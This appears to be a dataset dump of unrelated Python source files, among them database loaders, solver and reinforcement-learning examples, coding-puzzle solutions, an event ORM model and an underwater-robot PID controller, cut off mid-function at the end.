text stringlengths 8 6.05M |
|---|
import mongoengine as db
from plants import Plant
def load_plants():
basil = Plant(_id = 'basil', plant_friends = [], plant_foes = [])
cantaloupe = Plant(_id = 'cantaloupe', plant_friends = [], plant_foes = [])
onion = Plant(_id = 'onion', plant_friends = [], plant_foes = [])
pepper = Plant(_id = 'pepper', plant_friends = [], plant_foes = [])
tomato = Plant(_id = 'tomato', plant_friends = [], plant_foes = [])
basil.save()
cantaloupe.save()
onion.save()
pepper.save()
tomato.save()
if __name__ == '__main__':
db.connect(alias='gardengraph', db='gardengraph', host='mongodb://localhost/gardengraph')
load_plants()
print("Successfully loaded and connected to db.") |
##todo: zamiana najwiekszej i najmniejszej w liscie
# li = [2, 4, 6, 3, 5, 1, 8, 10, 11, 4, 564]
# minli = li[0]
# maxli = li[0]
# for i in li:
# if i > maxli:
# maxli = i
# elif i < minli:
# minli = i
# maxin = li.index(maxli)
# minin = li.index(minli)
# li[minin] = maxli
# li[maxin] = minli
# print(li)
##todo: zagniezdzanie list
# x = [[1,2,3], [4,5,6]]
#
# a = [1,2,3]
# b = [4,5,6]
#
# x = [a, b]
#
# print(x[0][2])
##todo:ctrl d zeby linnie dublowac
#copy vs deepcopy raw string
##todo:napisy
#
# while 1:
# word = input('Podaj słowo: ')
# if "break" == word:
# break
# LIST_SAMO = ['a', 'e', 'i', 'o', 'u', 'y']
# samogloski = 0
#
# for i in LIST_SAMO:
# samogloski += word.lower().count(i)
# print(samogloski)
#
# for i in LIST_SAMO:
# x = word.lower().count(i)
# print(f'Ilość samogłosek {i}: {x}')
##todo: text pomiędzy <>
# text = input('Podaj text: ')
# for i in range(len(text)):
# if text[i] == "<":
# start = i
# elif text[i] == ">":
# end = i
# print((text[start+1:end]))
|
##
# Copyright : Copyright (c) MOSEK ApS, Denmark. All rights reserved.
#
# File : solutionquality.py
#
# Purpose : To demonstrate how to examine the quality of a solution.
##
import sys
import mosek
def streamprinter(msg):
sys.stdout.write (msg)
sys.stdout.flush ()
if len(sys.argv) <= 1:
print ("Missing argument, syntax is:")
print (" solutionquality inputfile")
else:
try:
# Create the mosek environment.
with mosek.Env () as env:
# Create a task object linked with the environment env.
# We create it with 0 variables and 0 constraints initially,
# since we do not know the size of the problem.
with env.Task (0, 0) as task:
task.set_Stream (mosek.streamtype.log, streamprinter)
# We assume that a problem file was given as the first command
# line argument (received in `argv')
task.readdata (sys.argv[1])
# Solve the problem
task.optimize ()
# Print a summary of the solution
task.solutionsummary (mosek.streamtype.log)
whichsol= mosek.soltype.bas
solsta= task.getsolsta(whichsol)
pobj,pviolcon,pviolvar,pviolbarvar,pviolcones,pviolitg,dobj,dviolcon,dviolvar,dviolbarvar,dviolcones = task.getsolutioninfo(whichsol)
if solsta in [mosek.solsta.optimal,mosek.solsta.near_optimal]:
abs_obj_gap = abs(dobj-pobj)
rel_obj_gap = abs_obj_gap/(1.0 + min(abs(pobj),abs(dobj)))
max_primal_viol = max(pviolcon,pviolvar)
max_primal_viol = max(max_primal_viol ,pviolbarvar)
max_primal_viol = max(max_primal_viol ,pviolcones)
max_dual_viol = max(dviolcon,dviolvar)
max_dual_viol = max(max_dual_viol ,dviolbarvar)
max_dual_viol = max(max_dual_viol ,dviolcones)
# Assume the application needs the solution to be within
# 1e-6 ofoptimality in an absolute sense. Another approach
# would be looking at the relative objective gap
print ("\n\n")
print ("Customized solution information.\n")
print (" Absolute objective gap: %e\n"%abs_obj_gap)
print (" Relative objective gap: %e\n"%rel_obj_gap)
print (" Max primal violation : %e\n"%max_primal_viol)
print (" Max dual violation : %e\n"%max_dual_viol)
accepted= True
if rel_obj_gap>1e-6 :
print ("Warning: The relative objective gap is LARGE.")
accepted = False
# We will accept a primal infeasibility of 1e-8 and
# dual infeasibility of 1e-6. These number should chosen problem
# dependent.
if max_primal_viol>1e-8 :
print ("Warning: Primal violation is too LARGE")
accepted = False
if max_dual_viol>1e-6 :
print ("Warning: Dual violation is too LARGE.")
accepted = False
if accepted:
numvar = task.getnumvar()
print ("Optimal primal solution")
xj=[0.]
for j in range(numvar):
task.getxxslice(whichsol,j,j+1,xj)
print ("x[%d]: %e\n"%(j,xj[0]))
else:
#Print detailed information about the solution
task.analyzesolution(mosek.streamtype.log,whichsol)
elif solsta in [mosek.solsta.dual_infeas_cer, mosek.solsta.prim_infeas_cer,\
mosek.solsta.near_dual_infeas_cer, mosek.solsta.near_prim_infeas_cer]:
print ("Primal or dual infeasibility certificate found.")
elif solsta == mosek.solsta.unkwown:
print ("The status of the solution is unknown.")
else:
print ("Other solution status")
except mosek.Error as e:
print (e)
|
from twitter.checkstyle.common import Nit, PythonFile
from twitter.checkstyle.plugins.new_style_classes import NewStyleClasses
def test_new_style_classes():
nsc = NewStyleClasses(PythonFile.from_statement("""
class OldStyle:
pass
class NewStyle(object):
pass
"""))
nits = list(nsc.nits())
assert len(nits) == 1
assert nits[0]._line_number == 1
assert nits[0].code == 'T606'
assert nits[0].severity == Nit.ERROR
nsc = NewStyleClasses(PythonFile.from_statement("""
class NewStyle(OtherThing, ThatThing, WhatAmIDoing):
pass
"""))
nits = list(nsc.nits())
assert len(nits) == 0
nsc = NewStyleClasses(PythonFile.from_statement("""
class OldStyle(): # unspecified mro
pass
"""))
nits = list(nsc.nits())
assert len(nits) == 1
assert nits[0].code == 'T606'
|
import io
import numpy as np
import sys
from gym.envs.toy_text import discrete
import mdptoolbox.example
WAIT = 0
CUT = 1
class ForestEnv(discrete.DiscreteEnv):
"""
Generate a MDP example based on a simple forest management scenario
Reference: https://pymdptoolbox.readthedocs.io/en/latest/api/example.html#mdptoolbox.example.forest
"""
metadata = {'render.modes': ['human', 'ansi']}
def __init__(self, num_states=3):
_, R = mdptoolbox.example.forest(S=num_states)
p = 0.1 # The probability that a fire burns the forest
nS = num_states
nA = 2
P = {}
for s in range(nS):
# P[s][a] = (prob, next_state, reward, is_done)
P[s] = {a : [] for a in range(nA)}
reward_on_wait = R[s, WAIT]
reward_on_cut = R[s, CUT]
P[s][WAIT] = [(p, 0, reward_on_wait, None), (1.0 - p, min(s + 1, nS - 1), reward_on_wait, None)]
P[s][CUT] = [(1.0, 0, reward_on_cut, None)]
# Initial state distribution is uniform
isd = np.ones(nS) / nS
# We expose the model of the environment for educational purposes
# This should not be used in any model-free learning algorithm
self.P = P
super(ForestEnv, self).__init__(nS, nA, P, isd)
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import os
import sys
import zipfile
import projectConfig
global azip
# 初始化一个zip文件
def ZipInit(targetzip):
global azip
azip = zipfile.ZipFile(targetzip, 'w',zipfile.ZIP_DEFLATED)
# 添加文件
def AddFile(srcfile):
global azip
if os.path.isfile(srcfile):#文件
azip.write(srcfile)
if os.path.isdir(srcfile):#文件夹
azip.write(srcfile) #移动目录
for dirpath,dirnames,filenames in os.walk(srcfile):#压缩目录下的所有文件
for filename in filenames:
# print "file-",file
# print
azip.write(os.path.join(dirpath, filename))
# 压缩完毕
def ZipEnd():
global azip
if azip:
azip.close()
else:
print "zip not init---please init first"
# 解压
def ZipExtral(targetzip,destpath):
global azip
azip = zipfile.ZipFile(targetzip)
for file in azip.namelist():
azip.extract(file,destpath)
azip.close()
#7 zip-------------------------------------------------
#把 zipFolder指定文件夹压缩成saveZipName
#压缩的时候只想把一个目录下的所有文件压缩,文件目录使用.\\dir\\* 这样压缩的zip不包含根目录
def zipFolder(saveZipName,zipFolder,pwd = None):#压缩文件
cmd = projectConfig.Zip_Exe +" a "+saveZipName+" "+zipFolder +" -mx=9 -mm=LZMA"
if pwd:
cmd = cmd +" -p"+pwd
print cmd
os.system(cmd)
#解压zip
def extralFolder(zippath,savefoler,pwd= None):#解压zip
# savefoler = os.path.join( os.getcwd(),savefoler)
if not os.path.exists(savefoler):
os.makedirs(savefoler)
cmd = projectConfig.Zip_Exe+ " x -o "+savefoler+" "+zippath
if pwd:
cmd = cmd +" -p"+pwd
print cmd
os.system(cmd)
#7 zip-------------------------------------------------
# ZipInit("tes1t.zip")
# AddFile("folder1")
# AddFile("folder2")
# ZipEnd()
|
import numpy as np
import cv2
import utils
import os
import argparse
from util_classes import Model, Template, Store
from utils import *
from cv2 import *
from matplotlib.patches import Circle, Wedge, Polygon
from matplotlib.collections import PatchCollection
from matplotlib.animation import FFMpegWriter
import time
def parse_args():
desc = "Python implementation of the post processing for pose estimation"
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('--images_name', type=str, default='', help='the name generic of the images')
parser.add_argument('--nb_image', type=int, default=0, help='the number of images you have')
parser.add_argument('--v', type=bool, default=False, help='verbose mode')
return check_args(parser.parse_args())
def check_args(args):
try:
assert os.path.exists(args.images_name)
except:
print('image not found')
return None
return args
def main():
args = parse_args()
if args is None:
exit()
fig = plt.figure('Figure')
for i in range(args.nb_image+1):
im_name = args.images_name
im_name = im_name[0:len(im_name)-10] + '{:06d}'.format(i) + im_name[len(im_name)-4:len(im_name)]
[img_crop, mapIm, _, mesh2d_fp, _, _] = mesh_kpts(im_name, verbosity=args.v)
#img_with_keypoints = 0.5 * mapIm + img_crop * 0.5
#
## configuration of the figure
#
#ax1 = fig.add_subplot(141)
#ax1.axes.get_xaxis().set_visible(False)
#ax1.axes.get_yaxis().set_visible(False)
#ax1.imshow(img_crop)
#
#ax2 = fig.add_subplot(142)
#ax2.axes.get_xaxis().set_visible(False)
#ax2.axes.get_yaxis().set_visible(False)
#ax2.imshow(img_with_keypoints)
#
#ax7 = fig.add_subplot(143)
#ax7.axes.get_xaxis().set_visible(False)
#ax7.axes.get_yaxis().set_visible(False)
#ax7.imshow(img_crop)
#polygon = Polygon(mesh2d_fp, linewidth=1, edgecolor='g', facecolor='none')
#ax7.add_patch(polygon)
#
#ax8 = fig.add_subplot(144)
#ax8.axes.get_xaxis().set_visible(False)
#ax8.axes.get_yaxis().set_visible(False)
#ax8.imshow(img_with_keypoints)
#polygon = Polygon(mesh2d_fp, linewidth=1, edgecolor='g', facecolor='none')
#ax8.add_patch(polygon)
#
#print('frame number : ',i)
#fig.subplots_adjust(wspace=0)
#fig.savefig('./video_demo/frame_'+im_name[-10:len(im_name)])
#fig.clear()
#fps = 30
#fourcc = cv2.VideoWriter_fourcc('X','V','I','D')
#v = cv2.VideoWriter('./video_demo.avi',fourcc,30.0,(540,180))
#
#
#for i in range(args.nb_image +1):
#
# im_name = args.images_name
# im_name = im_name[0:len(im_name) - 10] + '{:06d}'.format(i) + im_name[len(im_name) - 4:len(im_name)]
# im_name = './video_demo/frame_' + im_name[-10:len(im_name)]
#
# im = cv2.imread(im_name)
#
# crop_img = im[150:150+180, 60:640-40]
#
# v.write(crop_img)
# print('frame number : ',i)
#cv2.destroyAllWindows()
#v.release()
return 0
if __name__ == '__main__':
debut = time.time()
main()
fin = time.time()
print((fin-debut)) |
# coding: utf-8
# Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
from made_bitree import TreeNode
class Solution:
# @param root, a tree node
# @return an integer
def minDepth(self, root):
# the code comes from the problem "Binary tree level order traversal"
pre = []
cur = [root]
tra = []
level = 0
if root:
while cur:
pre, cur = cur[:], []
level += 1
for node in pre:
if not (node.left or node.right):
return level
if node.left:
cur.append(node.left)
if node.right:
cur.append(node.right)
else:
return 0
# root = TreeNode("{3,9,20,#,#,15,7}")
root = TreeNode("{1,2}")
a = Solution()
print a.minDepth(root) |
import re
import numpy as np
from collections import Counter
class TokenPreprocessor:
"""
A util-class for preprocessing tokens created by the morphological_analyzer.
It has ability to modify words like removal of stopwords.
The list of tokens which are supposed to be preprocessed are to be specified
as the argument of the constructor.
After calling methods for preprocess, the result can be accessed by the attribute "result".
"""
def __init__(self, tokenized_list):
"""
Constructor
Parameters
----------
tokenized_list : list of list of tokens
The list of tokens to be preprocessed.
The parameter can be obtained by the morphological_analyser.analyze() method.
"""
self.result = tokenized_list
def get_words(self):
"""
Get words by string as the result of preprocesses.
Returns
-------
word_list : list of list of str
The list of words created from preprocessed tokens.
"""
word_list = [[token.surface for token in sentence] for sentence in self.result]
return word_list
def remove_blanks(self):
"""
Remove blank words in given tokens.
"""
self.result = [[token for token in sentence if token.surface] for sentence in self.result]
def remove_stopword(self, stopwords):
"""
Remove stopwords in given tokens.
Parameters
----------
stopwords : list of str
The list of words to be removed from tokens. (stopwords)
"""
for stopword in stopwords:
self.result = [[token for token in sentence if stopword != token.surface]
for sentence in self.result]
def remove_by_regexes(self, regexes):
"""
Remove words matching given regular expressions.
Parameters
----------
regexes : list of str
The list of regexes to be used for the removal.
"""
for regex in regexes:
self.result = [[token for token in sentence if re.match(regex, token.surface) is None]
for sentence in self.result]
def remove_frequent_words(self, threshold=100):
"""
Remove frequent words in given tokens.
The words which has top-(threshold) occurence will be removed.
Parameters
----------
threshold : int
The threshold for removal.
"""
words_list = []
for sentence in self.result:
words = []
for token in sentence:
words.append(token.surface)
words_list.append(words)
# Get frequent words and remove them
frequent_words = self.__get_frequent_words(words_list, threshold)
self.result = [[token for token in sentence if token.surface not in frequent_words]
for sentence in self.result]
def __get_frequent_words(self, words_list, threshold):
fdist = Counter()
for words in words_list:
for word in words:
fdist[word] += 1
common_words = {word for word, freq in fdist.most_common(threshold)}
return common_words
def filter_by_part_of_speeches(self, part_of_speeches):
"""
Filter tokens by given part of speeches.
The tokens whose part of speech matches one of "part_of_speeches" will be extracted.
Parameters
----------
part_of_speeches : list of str
The list of part of speeches to be used for filtering tokens.
"""
self.result = [[token for token in sentence if any(x in token.part_of_speech for x in part_of_speech_list)]
for sentence in self.result]
|
import os
import re
def transform_data(input_data_file):
return_list = []
dict_append = {}
with open(input_data_file) as openfile:
lines = openfile.read()
for elem in lines.split("\n\n"):
passport_list = elem.split()
for passport in passport_list:
key, value = passport.split(":")
dict_append[key] = value
return_list.append(dict_append)
dict_append = {}
return return_list
def check_data(passports_as_list):
# byr
# iyr
# eyr
# hgt
# hcl
# ecl
# pid
valid_passports = 0
validatikon_keys = ["byr", "iyr", "eyr", "hgt", "hcl", "ecl", "pid"]
for passport in passports_as_list:
for key in validatikon_keys:
if key not in passport:
break
else:
# Continue if the inner loop wasn't broken.
if check_hair(passport["hcl"]) and \
check_eye(passport["ecl"]) and \
check_pid(passport["pid"]) and \
check_height(passport["hgt"]) and \
check_between(1920, 2002, passport["byr"]) and \
check_between(2010, 2020, passport["iyr"]) and \
check_between(2020, 2030, passport["eyr"]):
valid_passports += 1
continue
return valid_passports
def check_between(a, b, check_value):
if a <= int(check_value) <= b:
return True
else:
print("Invalid", check_value)
return False
def check_height(hgt):
try:
temp = re.compile("([0-9]+)([a-z]+)")
number, unit = temp.match(hgt).groups()
if unit == "in":
if 59 <= int(number) <= 76:
return True
elif unit == "cm":
if 150 <= int(number) <= 193:
return True
print("Invalid Height", hgt)
return False
except:
print("Invalid Height", hgt)
return False
def check_hair(hcl):
if re.search(r"^#([0-9a-f]{6})", hcl):
return True
print("Invalid Hair", hcl)
return False
def check_eye(ecl):
valid_eye_color = ["amb", "blu", "brn", "gry", "grn", "hzl", "oth"]
if ecl in valid_eye_color:
return True
print("Invalid EYE", ecl)
return False
def check_pid(pid):
if re.search(r"^([0-9]{9}$)", pid):
return True
print("Invalid PID", pid)
return False
if __name__ == '__main__':
current_dir = os.path.dirname(os.path.abspath(__file__))
input_file = os.path.join(current_dir, 'input.txt')
passports_as_list = transform_data(input_file)
print("Valid Passports", check_data(passports_as_list))
|
import u12
import numpy
d = u12.U12()
digital_readout=[]
pins = [0, 1, 2 , 4]
for x in pins:
# serial = 100039255
digital_readout.append(d.eDigitalIn(x, readD= 1))
bcd=[]
for x in digital_readout:
bcd.append(x["state"])
int_exp = bcd[0]*1+bcd[1]*2+bcd[2]*8+ bcd[3]*4
analog_mantissa = d.eAnalogIn(0)
flt_mantissa = analog_mantissa["voltage"]
#d.localID(2)
# print(d.eAnalogIn(0, 100035035))
# k=d.digitalIO()
# print(d.eDigitalIn(0))
# print(digital_readout)
print "Mantissa: " + str(flt_mantissa)
print "Exponent: " + str(int_exp)
print "Chamber Pressure Reading: " + str(flt_mantissa) + " * 10^ -" + str(int_exp)
pressure = flt_mantissa * pow(10, -1*int_exp)
print pressure
|
"""This package contains the base class :class:`Source` for :class:`TwoPoint`
sources and implementations.
"""
# flake8: noqa
|
import os
from urllib.request import Request, urlopen
from ccdc.cavity import Cavity
import tempfile
def ftp_download(pdb_code, out_dir="pdb"):
url = f"https://files.rcsb.org/download/{pdb_code}.pdb"
response = urlopen(Request(url))
f = response.read().decode("utf-8")
# write out decoded file
with open(os.path.join(out_dir, f"{pdb_code}.pdb"), "w") as w:
w.write(f)
def main():
print(os.environ["CSDHOME"])
# from ccdc import io
# print(io.EntryReader('CSD'))
# pdb = "4P7X"
# tmp = tempfile.mkdtemp()
# ftp_download(pdb, out_dir=tmp)
#
# fpath = os.path.join(tmp, f"{pdb}.pdb")
# cavities = Cavity.from_pdb_file(fpath)
# cav = cavities[0]
#
# for feature in cav.features:
# print(feature)
# print(feature.residue)
if __name__ == "__main__":
main() |
import warnings
from datetime import datetime
from dateutil import rrule
from dateutil.rrule import rrulestr
from icalendar import Calendar as vCalendar
from icalendar import Event as vEvent
from icalendar import vRecur
from onegov.core.orm import Base
from onegov.core.orm.abstract import associated
from onegov.core.orm.mixins import content_property
from onegov.core.orm.mixins import ContentMixin
from onegov.core.orm.mixins import meta_property
from onegov.core.orm.mixins import TimestampMixin
from onegov.core.orm.types import UUID
from onegov.event.models.mixins import OccurrenceMixin
from onegov.event.models.occurrence import Occurrence
from onegov.file import File
from onegov.file.utils import as_fileintent
from onegov.gis import CoordinatesMixin
from onegov.search import SearchableContent
from PIL.Image import DecompressionBombError
from pytz import UTC
from sedate import standardize_date
from sedate import to_timezone
from sqlalchemy import and_
from sqlalchemy import Column
from sqlalchemy import desc
from sqlalchemy import Enum
from sqlalchemy import func
from sqlalchemy import Text
from sqlalchemy.orm import backref
from sqlalchemy.orm import object_session
from sqlalchemy.orm import relationship
from sqlalchemy.orm import validates
from uuid import uuid4
class EventFile(File):
__mapper_args__ = {'polymorphic_identity': 'eventfile'}
class Event(Base, OccurrenceMixin, ContentMixin, TimestampMixin,
SearchableContent, CoordinatesMixin):
""" Defines an event.
Occurrences are stored in a seperate table containing only a minimal set
of attributes from the event. This could also be archieved using postgres
directly with dateutil/plpythonu/pg_rrule and materialized views.
Occurrences are only created/updated, if the event is published.
Occurrences are created only for this and the next year.
"""
__tablename__ = 'events'
occurrence_dates_year_limit = 2
#: Internal number of the event
id = Column(UUID, primary_key=True, default=uuid4)
#: State of the event
state = Column(
Enum('initiated', 'submitted', 'published', 'withdrawn',
name='event_state'),
nullable=False,
default='initiated'
)
#: description of the event
description = content_property()
#: the event organizer
organizer = content_property()
#: the event organizer's public e-mail address
organizer_email = content_property()
#: the event organizer's phone number
organizer_phone = content_property()
#: an external url for the event
external_event_url = content_property()
#: the price of the event (a text field, not an amount)
price = content_property()
#: the source of the event, if imported
source = meta_property()
#: when the source of the event was last updated (if imported)
source_updated = meta_property()
#: Recurrence of the event (RRULE, see RFC2445)
recurrence = Column(Text, nullable=True)
#: The access property of the event, taken from onegov.org. Not ideal to
#: have this defined here, instead of using an AccessExtension, but that
#: would only be possible with deeper changes to the Event model.
access = meta_property(default='public')
#: The associated image
image = associated(
EventFile, 'image', 'one-to-one', uselist=False, backref_suffix='image'
)
#: The associated PDF
pdf = associated(
EventFile, 'pdf', 'one-to-one', uselist=False, backref_suffix='pdf'
)
def set_image(self, content, filename=None):
self.set_blob('image', content, filename)
def set_pdf(self, content, filename=None):
self.set_blob('pdf', content, filename)
def set_blob(self, blob, content, filename=None):
""" Adds or removes the given blob. """
filename = filename or 'file'
if not content:
setattr(self, blob, None)
elif getattr(self, blob):
getattr(self, blob).reference = as_fileintent(content, filename)
else:
try:
setattr(self, blob, EventFile(
name=filename,
reference=as_fileintent(content, filename)
))
except DecompressionBombError:
setattr(self, blob, None)
#: Occurences of the event
occurrences: 'relationship[list[Occurrence]]' = relationship(
"Occurrence",
cascade="all, delete-orphan",
backref=backref("event"),
lazy='joined',
)
es_properties = {
'title': {'type': 'localized'},
'description': {'type': 'localized'},
'location': {'type': 'localized'},
'organizer': {'type': 'localized'}
}
@property
def es_public(self):
return self.state == 'published'
@property
def es_skip(self):
return self.state != 'published' or getattr(self, '_es_skip', False)
def source_url(self, request):
""" Returns an url pointing to the external event if imported. """
if not self.source:
return None
if self.source.startswith('guidle'):
guidle_id = self.source.split('-')[-1].split('.')[0]
return f"https://www.guidle.com/angebote/{guidle_id}"
def __setattr__(self, name, value):
""" Automatically update the occurrences if shared attributes change.
"""
super().__setattr__(name, value)
if name in ('state', 'title', 'name', 'location', 'tags',
'start', 'end', 'timezone', 'recurrence'):
self._update_occurrences()
@property
def base_query(self):
session = object_session(self)
return session.query(Occurrence).filter_by(event_id=self.id)
@property
def latest_occurrence(self):
""" Returns the occurrence which is presently occurring, the next
one to occur or the last occurrence.
"""
base = self.base_query
current = base.filter(and_(
Occurrence.start <= func.now(),
Occurrence.end >= func.now()
)).order_by(Occurrence.start).limit(1)
future = base.filter(
Occurrence.start >= func.now()
).order_by(Occurrence.start).limit(1)
past = base.filter(
Occurrence.end <= func.now()
).order_by(desc(Occurrence.start))
return current.union_all(future, past).first()
def future_occurrences(self, offset=0, limit=10):
return self.base_query.filter(
Occurrence.start >= func.now()
).order_by(Occurrence.start).offset(offset).limit(limit)
@validates('recurrence')
def validate_recurrence(self, key, r):
""" Our rrules are quite limited in their complexity. This validator
makes sure that is actually the case.
This is a somewhat harsh limit, but it mirrors the actual use of
onegov.event at this point. More complex rrules are not handled by the
UI, nor is there currently a plan to do so.
Currently supported are weekly recurrences and lists of rdates.
The rational is that people commonly add recurring events on a weekly
basis (which is a lot of work for a whole year). Or on a monthly
or yearly basis, in which case selection of single dates is
acceptable, or even preferrable to complex rrules.
This UI talk doesn't belong into a module of course, but it is again
a reailty that only a strict subset of rules is handled and so we want
to catch events which we cannot edit in our UI early if they are
imported from outside.
"""
if r:
rule = rrulestr(r)
# a rule must either have a frequency or be a list of rdates
if not hasattr(rule, '_freq'):
if all((l.startswith('RDATE') for l in r.splitlines())):
return r
raise RuntimeError(f"'{r}' is too complex")
# we also only do weekly recurrences (they can also be used
# to do daily recurrences if they are set to include all days)
if not rule._freq == rrule.WEEKLY:
raise RuntimeError(f"The frequency of '{r}' is not WEEKLY")
# we require a definite end
if not hasattr(rule, '_until'):
raise RuntimeError(f"'{r}' has no UNTIL")
# we also want the end date to be timezone-aware
if rule._until.tzinfo is None:
raise RuntimeError(f"'{r}''s UNTIL is not timezone-aware")
return r
def occurrence_dates(self, limit=True, localize=False):
""" Returns the start dates of all occurrences.
Returns non-localized dates per default. Limits the occurrences per
default to this and the next year.
"""
def to_local(dt, timezone):
if dt.tzinfo:
return to_timezone(dt, timezone).replace(tzinfo=None)
return dt
dates = [self.start]
if self.recurrence:
# Make sure the RRULE uses local dates (or else the DST is wrong)
start_local = to_local(self.start, self.timezone)
try:
rule = rrulestr(self.recurrence, dtstart=self.start)
if getattr(rule, '_dtstart', None):
rule._dtstart = to_local(rule._dtstart, self.timezone)
if getattr(rule, '_until', None):
rule._until = to_local(rule._until, self.timezone)
rule = rrulestr(str(rule))
except ValueError:
# This might happen if only RDATEs and EXDATEs are present
rule = rrulestr(self.recurrence, dtstart=start_local)
# Make sure, the RDATEs and EXDATEs contain the start times
for attribute in ('_exdate', '_rdate'):
if hasattr(rule, attribute):
setattr(rule, attribute, [
to_local(date_, self.timezone).replace(
hour=start_local.hour, minute=start_local.minute
)
for date_ in getattr(rule, attribute)
])
# Generate the occurences and convert to UTC
dates = [standardize_date(date_, self.timezone) for date_ in rule]
# Make sure the start date is port of the reucrrence
if self.start not in dates:
dates.append(self.start)
dates.sort()
if localize:
dates = [to_timezone(date_, self.timezone) for date_ in dates]
if limit:
max_year = datetime.today().year + self.occurrence_dates_year_limit
dates = [date_ for date_ in dates if date_.year <= max_year]
return dates
def spawn_occurrence(self, start):
""" Create an occurrence at the given date, without storing it. """
end = start + (self.end - self.start)
name = '{0}-{1}'.format(self.name, start.date().isoformat())
return Occurrence(
title=self.title,
name=name,
location=self.location,
tags=self.tags,
start=start,
end=end,
timezone=self.timezone,
)
@property
def virtual_occurrence(self):
""" Before the event is accepted, there are no real occurrences stored
in the database.
At this time it is useful to be able to generate the latest occurence
without storing it.
"""
for start in self.occurrence_dates(limit=False):
occurrence = self.spawn_occurrence(start)
occurrence.event = self
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore', 'Object of type <Occurrence> not in session')
session = object_session(self)
session.expunge(occurrence)
session.flush()
return occurrence
def _update_occurrences(self):
""" Updates the occurrences.
Removes all occurrences if the event is not published or no start and
end date/time is set. Only occurrences for this and next year are
created.
"""
# clear old occurrences
self.occurrences = []
# do not create occurrences unless the event is published
if not self.state == 'published':
return
# do not create occurrences unless start and end is set
if not self.start or not self.end:
return
# create all occurrences for this and next year
for start in self.occurrence_dates():
self.occurrences.append(self.spawn_occurrence(start))
def submit(self):
""" Submit the event. """
assert self.state == 'initiated'
self.state = 'submitted'
def publish(self):
""" Publish the event.
Publishing the event will generate the occurrences.
"""
assert self.state == 'submitted' or self.state == 'withdrawn'
self.state = 'published'
def withdraw(self):
""" Withdraw the event.
Withdraw the event will delete the occurrences."""
assert self.state in ('submitted', 'published')
self.state = 'withdrawn'
def get_ical_vevents(self, url=None):
""" Returns the event and all its occurrences as icalendar objects.
If the calendar has a bunch of RDATE's instead of a proper RRULE, we
return every occurrence as separate event since most calendars don't
support RDATE's.
"""
modified = self.modified or self.created or datetime.utcnow()
rrule = ''
if self.recurrence:
rrule = vRecur.from_ical(self.recurrence.replace('RRULE:', ''))
for dtstart in self.occurrence_dates():
dtstart = to_timezone(dtstart, UTC)
dtend = dtstart + (self.end - self.start)
vevent = vEvent()
vevent.add('uid', f'{self.name}-{dtstart.date()}@onegov.event')
vevent.add('summary', self.title)
vevent.add('dtstart', dtstart)
vevent.add('dtend', dtend)
vevent.add('last-modified', modified)
vevent.add('dtstamp', modified)
vevent.add('location', self.location)
vevent.add('description', self.description)
vevent.add('categories', self.tags)
if rrule:
vevent.add('rrule', rrule)
if url:
vevent.add('url', url)
if self.coordinates:
vevent.add('geo', (self.coordinates.lat, self.coordinates.lon))
yield vevent
if rrule:
break
def as_ical(self, url=None):
""" Returns the event and all its occurrences as iCalendar string.
"""
vcalendar = vCalendar()
vcalendar.add('prodid', '-//OneGov//onegov.event//')
vcalendar.add('version', '2.0')
for vevent in self.get_ical_vevents(url):
vcalendar.add_component(vevent)
return vcalendar.to_ical()
|
class Solution(object):
def findRelativeRanks(self, nums):
"""
:type nums: List[int]
:rtype: List[str]
"""
temp = {}
temp_nums = sorted(nums,reverse=True)
ans = []
for n in range(len(temp_nums)):
if n == 0:
temp[temp_nums[n]] = "Gold Medal"
elif n == 1:
temp[temp_nums[n]] = "Silver Medal"
elif n == 2:
temp[temp_nums[n]] = "Bronze Medal"
else:
temp[temp_nums[n]] = str(n+1)
for n in nums:
ans.append(temp[n])
return ans
|
# Generated by Django 3.2.5 on 2021-08-26 05:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app_order', '0003_auto_20210825_1607'),
]
operations = [
migrations.AddField(
model_name='products',
name='product_photo',
field=models.ImageField(blank=True, null=True, upload_to='product_photos/%Y/%m/%d/', verbose_name='Фото'),
),
]
|
import colorsys
import time
from typing import Union
import cv2 as cv
import numpy as np
from scipy import integrate
import pymurapi as mur
auv = mur.mur_init()
from typing import Tuple
class Color:
def __init__(self, x: float, y: float, z: float, name: str = ...) -> None:
self.name = name
self.x = x
self.y = y
self.z = z
def to_tuple(self) -> Tuple:
return (self.x, self.y, self.z)
class ColorRange:
def __init__(self, min_color: Color = ...,
max_color: Color = ...,
name: str = ..., ) -> None:
self.name = name
self.min_color = min_color
self.max_color = max_color
self.min_color.name = name
self.max_color.name = name
class MotorController:
def __init__(self, motor_id: int, target_auv: mur.auv.Auv):
"""
Initializes controller
:param motor_id:
id of controlled motor
:param target_auv:
AUV, whose motors will be controlled
:returns: MotorController
"""
self.id = motor_id
self.auv = target_auv
def set_power(self, power: Union[float, int]) -> None:
"""
Sets power of this motor
:param power:
Power to set motor to, automatically clamps power to -100 to 100 boundaries
"""
self.auv.set_motor_power(self.id, power if -100 < power < 100 else -100 if power < -100 else 100)
class PIDReg:
def __init__(self, p_coeff, i_coeff, d_coeff):
self.p_coeff = p_coeff
self.i_coeff = i_coeff
self.d_coeff = d_coeff
self.prev_iter_time = 0
self.dt = 0
self.de = 0
def compute(self, error: float) -> float:
"""Compute control signal of given PIDReg, rudimentary FBL-protection included
Args:
error (float): Error, based of which result will be computed
Returns:
float: Control signal, pass this into control sequence
"""
self.dt = time.thread_time()
control_signal: float = \
self.p_coeff * error + \
self.i_coeff * integrate.quad(lambda _: error * self.dt, 0, self.dt / 2)[0] + \
self.d_coeff * (self.de / self.dt)
control_signal = 50 if control_signal > 100 else -50 if control_signal < -100 else control_signal
self.de = control_signal
return control_signal
def move(angle: int = auv.get_yaw()):
yaw_pidr = PIDReg(.5, .01, .1)
lf_motor = MotorController(0, auv)
rf_motor = MotorController(1, auv)
stab_counter = 0
while stab_counter <= 10:
stab_counter += 1
x_error = clamp_angle(angle - auv.get_yaw())
u = yaw_pidr.compute(x_error)
lf_motor.set_power(-u)
rf_motor.set_power(u)
if x_error > 1:
stab_counter = 0
return auv.get_yaw()
def clamp_angle(angle):
if angle > 180:
return angle - 360
if angle < -180:
return angle + 360
return angle
def arrow_direction(arrow_contour):
arr_rect = cv.minAreaRect(arrow_contour)
arr_box = np.int0(cv.boxPoints(arr_rect))
arr_moments = cv.moments(arrow_contour)
